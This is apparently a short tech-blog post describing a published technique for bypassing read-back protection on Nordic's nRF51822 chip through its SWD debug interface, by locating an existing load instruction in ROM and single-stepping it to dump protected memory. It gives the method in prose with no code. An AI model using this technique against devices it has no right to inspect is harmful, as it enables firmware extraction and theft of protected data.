Instruction Set Hack For Protected Memory Access

The nRF51 Series SoCs is a family of low power Bluetooth chips from Nordic Semiconductor that is based on ARM Cortex cores. The nRF51822 has the Cortex M0 core and is used in a lot of products. [Loren] has written a blog post in which he claims to be able to circumvent read back protection on the chip, thus giving access to the ROM, RAM and registers as well as allow for interactive debugging sessions.

The hack stems from the fact that the  Serial Wire Debug or SWD interface cannot be completely disabled on these chips even if the Memory Protection Unit prevents access to any memory regions directly. The second key piece is the fact that CPU can fetch stuff from the code memory. Combined with the SWD super powers to make changes to the registers themselves, this can be a powerful tool.

The ARM instruction set contains a number of Indirect-Addressing Load Instructions and [Loren] points to a pseudo-instruction for LDR R2,[R0] which permits copying data from the location in the ROM that is specified by R0. The idea is to search for the instruction within the code that is already inside the ROM since we cannot write to the memory ourselves. So how do we do that? Easy just use the Program Counter to cycles through all the code-space keeping R0 and R2 as zero. When you hit an instruction that make R2 the same value as the stuff in 0x00000(as R0 is 0x00000), we have found the instruction. The value at 0x00000 is incidentally identified by the SWD initially as the value in the stack pointer.

Once you have the address(in the PC) for the instruction that can copy info from the ROM, its just a matter of setting R0 to different values, setting the PC to the LDR instruction location and single stepping it to watch it copy it to R2. Loop and you can dump the entire ROM. [Loren] has packaged the whole thing in a Python script(Github) which you can try out with an ST-Link at home.

The nRF51 is used in a lot of places including the BBC microbit as well as other devices that can be sniffed using cheap SDRs for a start. The game is afoot.

Older Post Newer Post